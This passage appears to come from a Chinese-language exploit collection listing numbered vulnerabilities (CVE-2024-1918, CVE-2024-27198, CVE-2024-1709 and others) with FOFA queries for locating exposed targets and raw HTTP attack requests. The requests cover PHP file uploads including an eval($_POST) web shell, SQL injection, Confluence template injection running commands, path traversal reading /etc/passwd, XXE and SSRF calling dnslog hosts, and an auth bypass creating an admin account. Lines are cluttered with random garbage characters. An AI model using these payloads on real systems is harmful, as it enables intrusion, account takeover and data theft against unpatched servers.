Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' ~; s0 y: b4 ^0 g1 G @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( f: ?( @4 {' d0 [( S7 \
Accept-Encoding: gzip, deflate1 B) Z) C$ M/ i1 ^/ Y
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793289 ~* G' C4 S5 r" O' M
Content-Length: 597
7 ]: \3 j5 I5 I4 F9 gOrigin: https://ip:port
/ D' E8 W1 c" k+ iReferer: https://ip:port/sysmanage/licence.php
9 m- t: C6 C( @# z( L5 uUpgrade-Insecure-Requests: 1# B+ U" t j$ o @
Sec-Fetch-Dest: document) i8 t2 c- e U) h3 X8 G1 `
Sec-Fetch-Mode: navigate+ h( R/ T/ o4 n% P' ?
Sec-Fetch-Site: same-origin: R4 e7 q: Y% |
Sec-Fetch-User: ?1. A0 y- L3 f( d. {" ^
Te: trailers' ]( ]1 F! `, G S, e' @, z
Connection: close6 A" [9 u& U# `) ^! B( ~
, B! }0 D( l' Q2 R-----------------------------42328904123665875270630079328& [5 `1 C Z0 D1 Z# @1 k
Content-Disposition: form-data; name="file_upload"; filename="2.php"
, U$ K+ Z& |8 L) r) LContent-Type: application/octet-stream) t" R6 W& p4 @" N* j: X) c
. w, B0 Q8 R& c<?php phpinfo()?>
2 v5 ~$ p: q! ^& \9 m$ C5 s6 D-----------------------------42328904123665875270630079328
; b3 v. N* h- ^; L, OContent-Disposition: form-data; name="id_type"
8 ]* Z5 f: U; r; G ]% I1 g( U4 j* ^! {$ ^, R+ q: j0 \
1
& a% h/ _1 `' s7 w( l, ?& i-----------------------------42328904123665875270630079328
, y" z9 v! ~; l7 F0 F: r3 yContent-Disposition: form-data; name="1_ck"/ Q' `9 E6 _ n# `9 B1 q- o0 I
5 w5 }$ ?* r/ g% T# P! q- L
1_radhttp
( c# f, F$ P$ j8 B; u-----------------------------42328904123665875270630079328
& H: i1 ^& C4 ?Content-Disposition: form-data; name="mode"' a# S' Z$ K. m# w
: v6 D" G ~3 J' y' ^
import* s3 ]" ]' ^( z( I0 b
-----------------------------42328904123665875270630079328: X! e1 J% w6 X" }! t
" }6 { {* x6 Y% W& Y. c0 |) ?1 p2 w1 }
文件路径/upload/2.php
$ D5 ` J, W6 _2 i! ?- `; m4 C1 y: D3 U6 v# a1 {
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 C# p) G" v7 b: v bCVE-2024-1918' a/ U& d8 Q( O; l: J" C
FOFA:title="Smart管理平台"$ T, \& _2 E( L: v$ |
POST /useratte/userattestation.php HTTP/1.1
3 D) N1 `. v( e0 fHost: 192.168.40.130:8443
7 x; x% E& _# [6 R- ~Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50$ k% n; b8 C. ~1 D% A
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko1 [- E% d& J; s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- L3 ]3 }) N0 A7 ]6 L U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 [. x1 ?' r6 @9 |7 U: CAccept-Encoding: gzip, deflate9 \- D+ `- ]1 b) d& C) S* N) R
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 c5 e0 o3 I" ~4 {0 `, ^: ?Content-Length: 592' Y, Y H$ R, Y
Origin: https://192.168.40.130:8443
4 T1 E- ~% l }: xUpgrade-Insecure-Requests: 1
6 [1 T, C! r* I6 \Sec-Fetch-Dest: document! G4 \/ v5 S& |7 z _5 H) m
Sec-Fetch-Mode: navigate
* T9 V' y& R* v6 TSec-Fetch-Site: same-origin
3 A0 F' t4 I2 _% L9 J! ?$ pSec-Fetch-User: ?1
9 }, @: H+ X8 J$ Y$ K5 y8 MTe: trailers
0 H" E1 @+ _; f- cConnection: close2 t7 r! W3 h; s+ s2 e: V7 \
8 R& c+ w, K; K4 X-----------------------------42328904123665875270630079328+ m0 c8 ^' O6 |/ ^
Content-Disposition: form-data; name="web_img"; filename="1.php"0 Y. B' Y Q9 ?* G
Content-Type: application/octet-stream
( w$ ]" Y/ V; y/ V& H( B& B% s3 `& j. T& P" i! h
<?php phpinfo();?>& d0 H% @: y. X: S5 l( I1 n1 x
-----------------------------42328904123665875270630079328/ W- A8 E8 d. T- E' n
Content-Disposition: form-data; name="id_type"
, w2 E2 S8 H6 z
y0 c+ E8 t1 u6 @2 G/ j0 A+ i, y11 [: x: g( ]3 y; T
-----------------------------423289041236658752706300793283 `: ~" Y5 P, C- l" w! p$ C
Content-Disposition: form-data; name="1_ck"& f' T3 |& j& e5 m5 ~
& ]$ x. r; {4 P. P2 Z1 [1_radhttp
" [) W( C# P4 v) V4 _-----------------------------42328904123665875270630079328: I9 X, |' z0 |) P" p: T [- S0 d x
Content-Disposition: form-data; name="hidwel"8 v9 J, C5 C( d! G
4 c# _: T; M6 h) H4 A xset
L8 B% N/ d# b3 |4 N! B-----------------------------42328904123665875270630079328
3 K4 }' \* O& G' J* c
2 ^$ A9 t8 m; b) o
3 H3 o" i+ P! ?boot/web/upload/weblogo/1.php! m1 M1 x4 d; ?9 F! u9 A+ O9 _
/ L8 h1 V1 S' W, Y9 N" ]+ M* n$ l122. 北京百绰智能s200管理平台/importexport.php sql注入
. ]' u- j# e9 h, S- J. TCVE-2024-27718FOFA:title="Smart管理平台"8 V9 }, N9 I: c: e r
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* L) ~! s8 Q6 V0 m
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
e( U1 `3 {& b+ THost: x.x.x.x
2 P& k4 {6 l5 TCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
2 b+ d( C- v2 Y% I5 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 c9 p; @1 d3 C) y3 J6 Q) U1 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' T! M4 z1 p4 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 Z0 H! g$ F) p
Accept-Encoding: gzip, deflate, br
* E# s: E) P2 @% A7 [) }6 {% tUpgrade-Insecure-Requests: 1
$ t1 I# ^+ k* o/ }Sec-Fetch-Dest: document
. q, x7 `. j' r) T9 rSec-Fetch-Mode: navigate
9 o9 {$ F X8 t- V9 B6 rSec-Fetch-Site: none
8 d/ L6 F. ^6 o% b6 G, dSec-Fetch-User: ?1
3 X ~" x; ], u4 KTe: trailers
6 \& d2 ^3 C& AConnection: close" _+ O7 P+ X" y# I3 k) Z
3 s0 B8 a6 s' n8 p4 j1 ^
0 g9 r! q0 J, o% Z3 V4 G) s
123. Atlassian Confluence 模板注入代码执行
0 b( p0 D7 Y, P3 KFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
0 @* j- q# P% c4 m( pPOST /template/aui/text-inline.vm HTTP/1.1' n- a' I2 o# \# W2 \/ C& A: `
Host: localhost:8090
5 a/ D2 `. B4 mAccept-Encoding: gzip, deflate, br( P0 N! ]- G/ {7 \' @2 z! Q
Accept: */*% c+ m1 O8 w R
Accept-Language: en-US;q=0.9,en;q=0.8
. x- V5 Q- s; j) wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36" N0 V, n2 k) ^, F" H" f; M2 T
Connection: close
9 ]' d4 H+ {5 _2 t2 vContent-Type: application/x-www-form-urlencoded& U; L: l0 b( W! Q2 H
* ]5 k, v& q9 |; t6 U& Xlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
; J# g! C( g5 |
- F1 i3 U2 k; e% }
) V# g0 [1 C, m% v' K7 I124. 湖南建研工程质量检测系统任意文件上传
# K% b+ q) o/ l% D3 c; kFOFA:body="/Content/Theme/Standard/webSite/login.css"2 `2 ^5 s/ I3 y" T
POST /Scripts/admintool?type=updatefile HTTP/1.1
/ L: B0 N p8 O1 ^Host: 192.168.40.130:8282
3 K: {7 N" ?$ B8 @: e3 {$ MUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
9 Z$ ?$ _; O0 w3 q2 }4 FContent-Length: 72" j( g- ]6 m5 t L0 r$ D) k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
& ]( Y9 _5 }5 Q, Y/ ~( W2 sAccept-Encoding: gzip, deflate, br
% W/ [7 w- S! J. K$ I- v1 ?% _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 L- a2 E! l1 n0 O4 v" F
Connection: close
1 v% k# P, i/ X. B, }( L" ]Content-Type: application/x-www-form-urlencoded9 H$ M6 B* {6 F7 g) N+ o9 F& S8 ]% @% X
2 p. O: K! x Q! k1 Y* w- k, l+ yfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
8 k! @5 K* ^9 N6 Q8 i# J
8 m7 T2 y% O! ~; s/ Y3 k) l/ H4 q; a* L. i
http://192.168.40.130:8282/Scripts/abcgcg.aspx
& D- r; f, o3 f9 ?- m& O) M- p+ s
0 J4 T- h5 W7 Y125. ConnectWise ScreenConnect身份验证绕过& l4 v2 B: Y' c$ l" w
CVE-2024-1709
; o/ O3 M3 |5 r& LFOFA:icon_hash="-82958153"
5 S* Y3 o+ \$ R2 whttps://github.com/watchtowrlabs ... bypass-add-user-poc
. ]. z) c% ~) O9 k3 q
1 l. G- X6 e1 a/ j
( a+ E; p4 k6 X5 c& C使用方法$ a: U# k/ V2 \$ {9 q! q
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!% ?( a* L" _; |! s
' f) u) M' P! O( ?5 ^$ v. G/ X f: F
" W/ B; _* @; H: }2 b/ M2 J创建好用户后直接登录后台,可以执行系统命令。% C0 Q* @( t' Z z# o6 K3 P- ]& x
) \! O1 y, L" O/ _! a. m
126. Aiohttp 路径遍历
6 { [& X, x0 K0 K hFOFA:title=="ComfyUI"
- _3 _( q, j7 [+ N1 k" @7 }GET /static/../../../../../etc/passwd HTTP/1.1
$ R' a0 `' ?$ [% yHost: x.x.x.x
" D9 H1 u7 R3 n6 K6 T* [* a$ sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 V7 j7 c. A3 ^- I* h
Connection: close/ B* h; N3 P+ ^/ B6 V( e1 n
Accept: */*: Z1 @0 ~3 l& E
Accept-Language: en0 }% A+ c8 B F- t( M. ^7 {
Accept-Encoding: gzip
% N! n; `! o0 E7 C' O" U8 V1 F$ f1 h6 A
6 |& a$ }' j2 Y: G2 Y& o127. 广联达Linkworks DataExchange.ashx XXE' ^8 V3 A6 n+ q o$ c& j3 v( f
FOFA:body="Services/Identification/login.ashx"
7 _4 U9 r' e! R/ e6 rPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- `# t& l- V. ^. V, u N9 @1 MHost: 192.168.40.130:8888
+ n: @# a/ d, D; QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
: H8 F6 f3 i' y$ C4 sContent-Length: 415
0 p4 r* X6 ], p/ l IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ o9 W+ X) @; o. d) D: DAccept-Encoding: gzip, deflate
+ E$ k6 b4 E+ x$ |' @Accept-Language: zh-CN,zh;q=0.9
, @8 {' M" G* q, y* Z+ ?: I5 V2 O4 [Connection: close
% N6 A( l, H: m% K) vContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0- ^1 ^# O( W1 z) L4 ^8 n1 k
Purpose: prefetch- n! G4 o& i! P3 d+ v
Sec-Purpose: prefetch;prerender
* d' f j2 O$ Q8 T& Q5 `* {8 w/ t! A/ S! k# [
------WebKitFormBoundaryJGgV5l5ta05yAIe0$ |4 L, X4 ?% U* f+ e4 ?
Content-Disposition: form-data;name="SystemName"
+ q1 z2 m* R6 Z$ S! a$ G' i& j# ^% p) U" {
BIM
- T6 j( ?& l% A) f------WebKitFormBoundaryJGgV5l5ta05yAIe0$ r+ C" ~' ^$ E6 t# U+ J
Content-Disposition: form-data;name="Params"9 G. t1 B. F6 y& x. L
Content-Type: text/plain
3 X3 r2 i6 Y3 o+ Z- P/ z2 ^3 S. ^- m* [+ x1 [9 v; m
<?xml version="1.0" encoding="UTF-8"?>
6 m9 E/ _' N7 N1 X0 [$ P+ ]<!DOCTYPE test [9 G# q) m, B9 O2 p# L; E6 Q4 }
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">5 `9 b0 f( b9 g! b' Q
]
5 G( I! {$ \* f7 A$ k/ Q- k' S>! }( w$ x, p2 j" q# B
<test>&t;</test>
* o8 M: k& w# g" N) S' ?3 E/ @+ ^* H0 V------WebKitFormBoundaryJGgV5l5ta05yAIe0--0 r1 A( {6 N6 W' Q* ^
( E4 H& i) I$ `8 n Y" Z4 C, P
3 R+ Q, W+ j) n r5 a6 Q3 G
/ z+ Q' M8 T0 o% `/ ^+ t
128. Adobe ColdFusion 反序列化
7 Z& b" ?" Z; c# ` @, oCVE-2023-38203 d9 ~3 u6 h% ]! {8 ~& g
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
! N3 R' L# V% mFOFA:app="Adobe-ColdFusion"5 P: a: C7 I' B6 p( o9 S
PAYLOAD d6 D! F& W* ?2 q
, m( [, W0 v- }8 H3 s$ v, [129. Adobe ColdFusion 任意文件读取
. C0 C! w2 H; I9 {0 @2 d9 T OCVE-2024-20767
/ D$ A; ~% S+ jFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
! u' x0 N: W+ _" `2 E+ w/ o1 Y第一步,获取uuid# U* `: R. p( v. e
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.10 n6 f |+ D5 e( S- s, ]5 J' A
Host: x.x.x.x
( S# j1 ?8 E% }2 q$ F+ R4 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ G7 i; L9 h3 p/ X. O( G
Accept: */*# m' C$ Y& l! Z7 H
Accept-Encoding: gzip, deflate
& G% p! D% N: Q7 T. ~Connection: close
3 s; K3 `( k6 T, l; {; R0 @- z. V5 K5 u2 _* L, A
2 @9 e+ r( j' N6 H5 G$ x* Y
第二步,读取/etc/passwd文件4 z1 Z2 Z7 u G4 B
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.10 A* o8 L3 u0 `/ H' q7 i
Host: x.x.x.x' I7 w4 S B; G y& b. g8 Q a+ {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 T, B0 S/ o9 vAccept: */*
/ [5 y/ _* ]3 t4 L9 `" xAccept-Encoding: gzip, deflate# X a& a" @$ D
Connection: close
) w) e9 ~9 g& x4 _2 @! S( Suuid: 85f60018-a654-4410-a783-f81cbd5000b95 I2 b7 Z- o* }* p! ~9 r, ?+ q
+ e/ X" k2 A2 K. z0 p
" G) ~: Y+ [0 ^- P! c
130. Laykefu客服系统任意文件上传
7 a% l4 D" y: O3 E+ NFOFA:icon_hash="-334624619"$ V _8 _; f) X" i, w
POST /admin/users/upavatar.html HTTP/1.1
0 L( {6 u5 R& J: `6 g. ]Host: 127.0.0.1# B+ |% ]) r! U' |4 v$ A
Accept: application/json, text/javascript, */*; q=0.01
+ c4 w4 k* G# TX-Requested-With: XMLHttpRequest' P- h( q$ s- z: _
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
8 Q; ^3 c, g* v( PContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR; K6 ] w/ Y* I+ G
Accept-Encoding: gzip, deflate! X& f. C3 T9 x) H: `# \
Accept-Language: zh-CN,zh;q=0.9
( b8 c4 c" l( S6 U2 z( }Cookie: user_name=1; user_id=3
0 D6 x0 k. f; `. E4 N5 o; y! o. j9 mConnection: close
% ]- }; |0 B# ^1 J9 F0 w2 x- N( K( S( Z) a' x/ ^3 u' {! d
------WebKitFormBoundary3OCVBiwBVsNuB2kR
6 S5 ?. ~# V4 ]6 T& S4 a" f6 M- EContent-Disposition: form-data; name="file"; filename="1.php"3 ~ [$ x2 l7 g" }% K7 k0 B
Content-Type: image/png1 Y: l( U6 ]6 p1 W4 f3 W
0 w- M/ G8 _' S6 s$ A' W" L" f5 l
<?php phpinfo();@eval($_POST['sec']);?>: v0 I& Z! q/ s I! B
------WebKitFormBoundary3OCVBiwBVsNuB2kR--7 d2 N8 i8 e D% @; L: v
5 L! v, L2 u8 @- n1 l- A
5 ~$ u% c9 m& }, z131. Mini-Tmall <=20231017 SQL注入* j0 \4 I% k2 ^7 H2 W
FOFA:icon_hash="-2087517259"/ G) a$ ]0 b+ P9 h: l
后台地址:http://localhost:8080/tmall/admin5 {& X1 \' _# F8 L. B
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0): j' }3 \9 A3 U* A( r& b i
+ Q3 n, D# p* Z" s6 Z" d132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过( O* @& k: z/ J- x% K
CVE-2024-27198
! q* W5 E" \% M1 B5 O" kFOFA:body="Log in to TeamCity"
' g6 p2 G- f# c" h# K/ Y( QPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.13 |& x& e, @- L* S0 _: F8 v
Host: 192.168.40.130:81118 N I% N G7 S# @% R+ R8 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 @* z1 ]7 R% i+ m% X4 h9 v2 fAccept: */*
+ y) N J9 e& N2 y& J- C& TContent-Type: application/json5 n$ [: _* n+ ^# v$ z
Accept-Encoding: gzip, deflate$ w2 ?4 M/ O5 \% W" n: m
& J& @/ a% S8 k{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# E# @0 z) |& w; u
6 B% w" q0 F7 h/ }+ ~8 ]' S' ^7 j; X3 s! v: r0 }6 e. H
CVE-2024-27199
+ ]& P0 L" G! Y/ {' j/res/../admin/diagnostic.jsp& I3 Z% _3 T/ c7 E% J6 c% ^
/.well-known/acme-challenge/../../admin/diagnostic.jsp
2 m6 @- B4 I. o! ~2 s2 b/update/../admin/diagnostic.jsp D' y; o- p& F; T0 X4 b
9 t% L9 ?- h) W% M2 m
, s* [/ N" @2 H% L5 I$ o4 ]( YCVE-2024-27198-RCE.py! g+ z5 \3 D( X# N' W1 o- [! r: q
/ c0 O. U0 ~& j# o. p y133. H5 云商城 file.php 文件上传5 ^# h8 m5 D( F$ v+ }% N; n3 L5 g
FOFA:body="/public/qbsp.php"1 }( R/ ^3 g9 \2 s! u4 r
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
$ E: p1 l. |, A! H$ gHost: your-ip& @% e" }# `7 j, G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ M+ D1 X1 h6 _: y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx0 g$ t' M* H3 p2 r! ^/ ]& L
6 i% s1 E0 P9 w) F) b" Y------WebKitFormBoundaryFQqYtrIWb8iBxUCx
* c8 T e2 |& }8 WContent-Disposition: form-data; name="file"; filename="rce.php"' X2 C1 f8 c7 c+ h0 `# L
Content-Type: application/octet-stream' q3 U! ~( R, } B/ R0 }! m
4 ?; t2 f! m) F7 f0 o
<?php system("cat /etc/passwd");unlink(__FILE__);?>: X3 g) J8 J9 }# }+ o! Z: k4 ~8 d
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
( N+ w! P W& O; w6 s2 z0 Y, R1 d. f5 P" d5 r
% r V& S# h6 E
; M8 Y+ K1 D; i: T* q( }8 A& c3 y9 J134. 网康NS-ASG应用安全网关index.php sql注入! [! @9 ]! |' j3 [: O5 X& Y
CVE-2024-23302 c3 X; V+ g6 P3 _: ^
Netentsec NS-ASG Application Security Gateway 6.3版本: y. g$ \+ Y& ^
FOFA:app="网康科技-NS-ASG安全网关"
. B4 ^. H$ e9 I. LPOST /protocol/index.php HTTP/1.1( ]2 g: h7 t3 ^
Host: x.x.x.x
3 P, [ h3 V+ H; K% m- HCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
5 ^; b- t; r" \! p- GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
2 [4 C0 [, ?6 h1 }4 @" ?Accept: */*
; @! J5 x. }+ c# ~' x9 o0 k3 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 r% \- V: V3 G& U. TAccept-Encoding: gzip, deflate" n" B0 X) z$ }3 r$ \1 A* k
Sec-Fetch-Dest: empty
: G5 h5 L, N9 T! HSec-Fetch-Mode: cors2 g* c8 ?" T! P
Sec-Fetch-Site: same-origin
% S J( G5 O( t1 h* j( c/ w' e7 e* e1 }$ U: oTe: trailers- T, D3 n& s* x
Connection: close7 j* E! y0 k; y
Content-Type: application/x-www-form-urlencoded
/ r W& f8 ^4 }; \: T n9 }Content-Length: 2633 Z. j' j; }& B4 B( v' M1 I
6 Z9 K$ R9 F/ i' A- ?; ~jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
& L+ ~: u j2 b" B+ W
0 |4 z) v1 q. x' D8 A; K! C) Z& Y5 t2 f8 S, S
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
2 Q$ Q0 K5 ~1 a4 DCVE-2024-2022
- W* b" w) G1 _! @/ wNetentsec NS-ASG Application Security Gateway 6.3版本* e K7 q7 C6 X5 {: L- B- h
FOFA:app="网康科技-NS-ASG安全网关", ~3 {1 `9 L5 W: ]- `8 }
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* A8 O1 a* g' E/ K3 q
Host: x.x.x.x
. K, O- @: A1 r8 ~( ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 |/ G$ U9 u1 O) c* YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 R2 g$ t& @7 Y" o1 cAccept-Encoding: gzip, deflate7 E5 K5 b- w; L4 I& `$ n
Accept-Language: zh-CN,zh;q=0.9
4 }9 p* A* z4 a9 J4 Q2 C* F5 ]Connection: close
' V) Z8 i+ w" O
( s* C" _$ T9 {, t8 M
2 R6 l$ H# ?& @8 u8 n6 w136. NextChat cors SSRF6 K4 B; F0 V7 Z
CVE-2023-49785
* n# r# b2 m3 t6 [0 r; `FOFA:title="NextChat"/ G* i. Y* y' f* Q4 \
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1! w4 [2 r4 R4 q$ n2 T9 a5 h
Host: x.x.x.x:10000 o4 D& N6 r# v y6 P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 Y2 d; L9 o$ d& |* v, k
Connection: close' W+ j2 u; A% {/ c
Accept: */*8 J1 D1 O1 {0 P( e+ D8 @/ m
Accept-Language: en7 H+ Z: T% n9 M; f6 D& t+ y- T! o
Accept-Encoding: gzip
/ B6 f" z6 P) J- t8 J: A3 a7 z/ h# }1 r# j
3 x$ M6 a Z! R& b) p! y* a, S% h0 V. ~9 H: s8 O
137. 福建科立迅通信指挥调度平台down_file.php sql注入
+ m$ }: C# x) E$ w: e) MCVE-2024-26201 `- g; x$ k# S4 W# @3 G) ]4 w/ {5 K' o
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 E& i H* n) y; t( O) L
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 _& C! p4 o) t' a b# J
Host: x.x.x.x! }7 ?, W: Y$ T1 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ T* c$ h0 t& q+ M. O" `8 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; i; t/ i- q: _! p I# H( v7 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 |6 u) W% ]$ o7 m0 F) qAccept-Encoding: gzip, deflate, br1 ~! F7 @$ Q* r; f% g/ ]
Connection: close
! _/ T+ |: i0 {, NCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
$ o! H f3 }' s+ T# l! U: M5 B; pUpgrade-Insecure-Requests: 1& a, s4 V: q5 p- b7 l( v
: l* @7 }- k K' l1 p
/ c: ?0 n( w x6 T4 m8 K
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" F7 c( t# s/ P) XCVE-2024-2621, d$ K% t: s" R4 `, E( I$ e Y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台") d: d5 Q* ?6 o# {: e! F& `
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
% S" s0 O, s/ `( B: Q7 e/ SHost: x.x.x.x& x/ Y- k; l) r/ ?% S r1 F% C% C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 s/ V0 L- M: ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ S l8 ]* c0 q8 K4 o+ r* aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 s. H& g$ ~) Q2 }0 }Accept-Encoding: gzip, deflate, br
' \* L; ~4 J; I7 wConnection: close
5 c4 Z$ R7 `% \3 ]$ U( C, {: |Upgrade-Insecure-Requests: 1
* H* M! C, r% Y- N3 T2 j1 @ X# Z, N7 Q4 p- }+ H0 \
5 ?3 S1 x( m' m- R, i. G+ V
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
+ H% u; C. p% ]% F* f/ @/ ECVE-2024-2622/ F$ j4 r, C3 ?
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 U& X0 W8 O S& N! v
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
' ?+ `; W% z7 ZHost: x.x.x.x
- P4 ]! _. W! Z! J& {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 X5 s' ]; w! f) a2 z1 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. j2 t, {: _6 T2 j5 ~- uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. h8 C. V2 g; O4 p" K/ |Accept-Encoding: gzip, deflate, br
$ e' _4 V6 X: q+ ]. E* O& I8 v6 OConnection: close
8 }+ i5 X! ~; C q( z+ t5 }Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
1 s7 E# `5 U. O9 D+ xUpgrade-Insecure-Requests: 1- y& v3 Q& s3 d/ _, E) Z
